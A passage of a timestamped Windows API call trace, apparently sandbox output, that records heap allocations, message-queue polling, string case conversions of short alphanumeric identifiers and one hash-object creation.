Size=0x10) returned 0x34aa7f0 [0253.651] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.651] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0253.651] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0253.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.651] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0253.651] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.652] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0253.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.652] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.652] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.652] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.652] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.652] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0253.652] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0253.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.653] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0253.653] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.653] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0253.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.653] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.653] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.653] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0253.653] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.654] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0253.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0253.654] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0253.654] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.654] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0253.654] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.654] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.655] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.655] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.655] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.655] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.655] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.655] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0253.655] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0253.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.656] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0253.656] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.656] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0253.656] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.656] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0253.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.656] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.657] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.657] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.657] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.657] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.657] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0253.657] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.658] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0253.658] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.658] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.658] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.658] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.658] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0253.658] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0253.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0253.659] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.659] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0253.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0253.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.659] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.659] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.659] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0253.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.661] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0253.661] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.661] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0253.661] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.661] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0253.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0253.662] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0253.662] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.663] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.663] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.663] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.664] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 